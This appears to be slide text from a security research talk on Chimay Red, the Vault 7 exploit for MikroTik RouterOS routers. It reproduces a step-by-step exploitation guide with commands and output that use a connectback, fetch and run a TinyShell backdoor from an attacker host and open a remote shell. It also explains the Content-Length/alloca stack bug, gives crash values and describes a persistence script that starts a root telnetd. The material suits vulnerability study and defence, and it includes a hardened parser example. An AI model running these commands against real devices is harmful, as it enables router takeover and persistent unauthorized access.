Chimay Red
Tools Revealed
Chimay Red exploit
Persistence exploit
BigNerd95
Chimay Red
“ChimayRed (CR) is an exploit that is used against MikroTik (MT) routers running RouterOS. This guide explains how to utilize ChimayRed to upload the TinyShell payload to the MikroTik router.”
(https://wikileaks.org/ciav7p1/cms/page_16384604.html)
Step-by-step guide
1. Verify that the MikroTik is running RouterOS 6.X
2. Verify python version 2.7 is installed
3. Determine the ICON IP Address
4. Go to ChimayRed bin directory
a. /home/ubuntu/Desktop/ChimayRed_v3.7/bin
5. Exploit RB 493G using ChimayRed.
a. python chimay_red.py -t 172.20.100.6:80 connectback -l 172.20.12.23 -p 4242
6. The following output should be observed, which confirms successful exploitation:
a. [+] Connecting to: 172.20.100.6:80
b. [+] Detected RouterOS: 6.27
c. [+] Detected architecture: mipsbe
d. [+] 0 seconds until Web server is reset.
e. [+] Web server reset.
f. [+] Connecting to target...
g. [+] Connected.
h. [+] Sending exploit payload...
i. [+] Exploit sent.
7. Make TinyShell executable.
8. Build TinyShell with the following parameters:
a. ./tshpatcher-1.0.4 -p 12345 -k MyPassphrase -m mt-mipsbe -o tshd-mipsbe -s /bin/ash
9. Upload TinyShell.
a. First setup the download_and_exe server on ICON.
b. cd ~/Desktop/ChimayRed_v3.7/bin
c. python tools/download_and_exe_server.py -l 172.20.12.23 -p 4242 -f ~/Desktop/TshPatcher_v1.0.4/tshd-mipsbe
d. Ctrl-Z
e. python chimay_red.py -t 172.20.100.6:80 download_and_exe -l 172.20.12.23 -p 4242 -f /tmp/tshd-mipsbe
f. <Press Enter>
g. fg
h. You should observe the following output:
i. [+] Got connection from 172.20.100.6:37874
j. [+] Sending 42864 bytes...
k. [+] Sent.
10. Connect to MK TinyShell
a. ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 172.20.100.6 12345 MyPassphrase
b. #
Supported RouterOS
All the install logs present in the leak were produced on versions prior to 6.30.
RouterOS changelog
(https://mikrotik.com/download/changelogs/current-release-tree)
Diaphora: www_6.38.4 vs www_6.38.5
readPostData diff (screenshots of the function in www_6.38.4 and www_6.38.5)
What is alloca?
“The alloca() function allocates size bytes of space in the stack frame of the caller. This temporary space is automatically freed when the function that called alloca() returns to its caller.”
(http://man7.org/linux/man-pages/man3/alloca.3.html)
What really happens?
The content_length_value is subtracted from the stack pointer register.
If we pass a big number, bigger than 130000 and smaller than 2147483647, the stack pointer will point outside the stack, and the first PUSH will generate a SEGFAULT.
If we pass a negative number (or a number from 2147483648 [-2147483648] to 4294967295 [-1]), no space on the stack is reserved, because the stack pointer is incremented instead of decremented.
But... the istream::Read function will then try to read about 4 billion bytes from the socket and write them onto the stack, generating a SEGFAULT before the function returns.
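The Content-Length handling described above, as an added example that is not from the slides or from the Chimay Red tooling: a parser that mimics the unchecked 32-bit value handed to alloca(), next to a bounded parser that rejects both the oversize and the wrapping values. STACK_BUDGET and the function names are assumptions for illustration.

```c
/* Added example, not from the slides: the unchecked Content-Length that
 * reaches alloca() in www, next to the bounded parser a fix needs.
 * STACK_BUDGET and all function names are assumptions for illustration. */
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

/* Assumed upper bound for a body buffered on the stack; the slides only say
 * that anything above 130000 already pushes the stack pointer off the stack. */
#define STACK_BUDGET 65536UL

/* Mimics the vulnerable pattern: the header is parsed as an unsigned number,
 * truncated to a 32-bit signed int, and that int sizes the alloca().
 * 4294967295 therefore becomes -1 and 2147483648 becomes INT32_MIN; a negative
 * size moves the stack pointer up instead of down, exactly as the slide says. */
int32_t naive_content_length(const char *hdr)
{
    return (int32_t)(uint32_t)strtoul(hdr, NULL, 10);  /* no sign or range check */
}

/* Hardened parser: digits only (no '-', '+' or whitespace), no trailing junk,
 * no overflow, and never above STACK_BUDGET. Returns the length on success
 * or -1 on rejection, so the caller can answer 400/413 instead of calling
 * alloca() with whatever the client sent. */
long safe_content_length(const char *hdr)
{
    char *end;
    unsigned long v;

    if (hdr == NULL || *hdr < '0' || *hdr > '9')
        return -1;                       /* strtoul would accept "-1" and " 5" */
    errno = 0;
    v = strtoul(hdr, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;                       /* overflow or non-digit characters */
    if (v > STACK_BUDGET)
        return -1;                       /* oversize and wrapped values alike */
    return (long)v;
}
```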
Persistence exploit
“place binary in "/flash/bin", and place script in "/flash/etc/rc.d/"”
(https://wikileaks.org/ciav7p1/cms/page_28049428.html)
(https://wikileaks.org/ciav7p1/cms/page_50495490.html)
/flash/etc/rc.d/run.d/
https://download2.mikrotik.com/routeros/[ROS_VERSION]/mikrotik-[ROS_VERSION].iso
https://download2.mikrotik.com/routeros/6.38.5/mikrotik-6.38.5.iso
https://download2.mikrotik.com/routeros/6.38.4/mikrotik-6.38.4.iso
https://download2.mikrotik.com/routeros/6.30/mikrotik-6.30.iso
5. In /etc/rc.d/run.d folder create a bash script called S99own (set execution permissions)
#!/bin/bash
mkdir /ram/mybin
/flash/bin/busybox-i686 --install -s /ram/mybin
export PATH=/ram/mybin:$PATH
telnetd -p 23000 -l bash
#bash # uncomment this line to spawn a root shell in the login screen
6. Unmount the disks and shut down the VM, remove the live ISO and boot again.
Debugging
Now you can attach a debugger to gdbserver at IP 192.168.2.124 and port 5050.
Crash POC
-1 = 4294967295
-2 = 4294967294